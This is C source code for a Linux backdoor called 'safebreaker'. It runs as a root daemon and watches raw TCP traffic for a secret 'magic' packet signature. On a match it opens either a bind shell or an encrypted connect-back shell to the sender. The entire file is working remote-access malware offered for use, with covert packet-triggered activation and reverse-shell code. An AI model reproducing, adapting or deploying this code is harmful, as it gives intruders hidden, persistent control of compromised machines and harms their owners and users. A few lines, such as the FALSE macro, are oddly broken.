/*
 * Written by Grid-Knight
 * http://www.informatik.uni-freiburg.de/~alsbiha
 *
 * Credits to:
 * 	-Richard W. Stevens, without his books, i would be lost 
 *	-newroot, i have learned a lot from you.
 *	-GNU, the gnutls is such a nice thing, with the best documentation i ever have seen.
 *
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <netdb.h>

// configuration file
#include "safebreaker.h"

#define TRUE	1
#define FALSE <=0

struct packet {
	struct ip     ip;
	struct tcphdr tcp;
	char data[1024];
};

struct tcp_pseudo {
	long src_addr;
	long dst_addr;
	unsigned int  dummy;
	unsigned int  proto;
	unsigned long length;
	struct tcphdr tcp;
} pseudohead;

struct help_checksum {
	struct tcp_pseudo pshd;
	struct tcphdr tcphd;
	char tcpdata[1024];
} tcp_chk_construct;

int terminal_shell (int port) {
	struct sockaddr_in sh;
	int thesock;
	int clisock;
	int fromlen;
	const int on = 1;

	chdir ("/");
	umask(0);

	fromlen=sizeof(sh);
		
	thesock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

	sh.sin_family = AF_INET;
	sh.sin_port = htons (port);
	sh.sin_addr.s_addr = INADDR_ANY;

	setsockopt(thesock,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));
	setsockopt(thesock,SOL_SOCKET,SO_RCVTIMEO,&on,sizeof(on));
	
	bind (thesock, (struct sockaddr *) &sh, sizeof (sh));
	listen (thesock, 1);
	clisock = accept (thesock, (struct sockaddr *) &sh, &fromlen);
	offer_terminal(clisock);
	return EXIT_SUCCESS;
}

int connectback_terminal (long dest, int port) {
	struct sockaddr_in client;
	struct protoent *proto;
	int thesock;
	int fd;
	int ret;
	pid_t pid;
	gnutls_session_t session;
	gnutls_anon_client_credentials_t anoncred;
	const int kx_prio[] = { GNUTLS_KX_ANON_DH, 0 };	
	
	gnutls_global_init ();
	gnutls_anon_allocate_client_credentials (&anoncred);
	
	// Initialize TLS session 
	gnutls_init (&session, GNUTLS_CLIENT);
	
	// Use default priorities
	gnutls_set_default_priority (session);
	gnutls_kx_set_priority (session, kx_prio);
	
	// put the anonymous credentials to the current session
	gnutls_credentials_set (session, GNUTLS_CRD_ANON, anoncred);
	
	client.sin_family = AF_INET;
	client.sin_port = htons(port);
	client.sin_addr.s_addr = dest;

	proto = getprotobyname("tcp");
	thesock = socket (AF_INET, SOCK_STREAM, proto->p_proto);
	sleep (1);
	if (0  !=  connect (thesock, (struct sockaddr *) &client, sizeof(client))) {
		safebreaker_error("connection to client failed");
	}
	safebreaker_ok("connected to client");

	chdir("/");
	umask(0);
	
	pid = fork ();
	if (pid < 0) {
		safebreaker_error("fork failed");
	}
	if (!pid) {				
		signal(SIGCHLD,SIG_IGN);
		setsid();			
		safebreaker_ok("connection to server established");
		//Terminal
		offer_terminal(thesock);
	} else  if (pid > 0) {
		close (thesock);
		exit (EXIT_SUCCESS);
	}
        return EXIT_SUCCESS;
}


int main (int argc, char **argv) {
	struct protoent *proto;
	struct sockaddr_in sin;

	// for the sniffer
	struct iphdr  *ip_header;
	struct tcphdr *tcp_header;

	// sizes 
	int iphlen;

	// sockets
	int rawsock;
	int fromlen;
	pid_t pid;

	unsigned char pkt_buf[BUFSIZ]; 	// incomming packet
	unsigned char *pkt_data;	// packet data

	if (getuid()) {
		safebreaker_error("you are not root");
	}
	//prevent zombie	
	signal(SIGCHLD,SIG_IGN);

	// daemonize 
	pid = fork ();
	if (pid < 0) {
		safebreaker_error("fork error");
	} else if (pid > 0) {
		exit (0); //parent
	}

	pid = setsid ();	// become session leader
	chdir ("/");
	umask(0);
	//prevent zombie	
	signal(SIGCHLD,SIG_IGN);

	proto = getprotobyname("tcp");
	rawsock = socket (AF_INET, SOCK_RAW, proto->p_proto);
	if (!rawsock) {
		safebreaker_error("create socket failed");
	}
	
	sin.sin_addr.s_addr = INADDR_ANY;
	sin.sin_family = AF_INET;

	while (TRUE) {
		memset (pkt_buf, 0x00, BUFSIZ);
		recvfrom (rawsock, pkt_buf, BUFSIZ-1, 0, (struct sockaddr*) &sin, &fromlen);
		ip_header = (struct iphdr *) pkt_buf;
		iphlen = ip_header->ihl<<2;

		// autentification syntax
		if (ip_header->protocol != IPPROTO_TCP) {
			continue;
		}

		tcp_header = (struct tcphdr *) (pkt_buf+iphlen);
		// skip if it dont matches our magic port
		if (tcp_header->dest != htons(MAGIC_PORT)){
			continue;
		}
	
		if (tcp_header->ack != MAGIC_ACK){
			continue;
		}
		if (tcp_header->syn != MAGIC_SYN){
			continue;
		}
	
		if (ip_header->id != htons (MAGIC_ID)) {
			continue;
		}

		switch (ntohl(tcp_header->seq)) {
			case CMD_TERM :
					// bindshell with terminal 
				{
					int myport;
					pkt_data = (pkt_buf + (sizeof (struct ip) +  sizeof(struct tcphdr)));
					myport = atoi(pkt_data);
					if (myport == 0) {
						continue;
					}

					pid = fork ();
					if (pid < 0) {
						continue;
					} else if (pid > 0) {
						continue;
					}
					// child prozess
					signal(SIGCHLD,SIG_IGN);
					pid = setsid ();
					terminal_shell(myport);
				}
				break;

				case CMD_BACKTERM :
				{
					int myport;
					pkt_data = (pkt_buf + (sizeof (struct ip) +  sizeof(struct tcphdr)));
					myport = atoi(pkt_data);
					if (myport == 0) {
						continue;
					}

					pid = fork ();
					if (pid < 0) {
						continue;
					} else if (pid > 0) {
						continue;
					}
					// child prozess
					signal(SIGCHLD,SIG_IGN);
					pid = setsid ();
					connectback_terminal(ip_header->saddr, myport);
				}
					break;
			
				default :
					continue;
					break;
		}
	}
	return EXIT_SUCCESS;
}
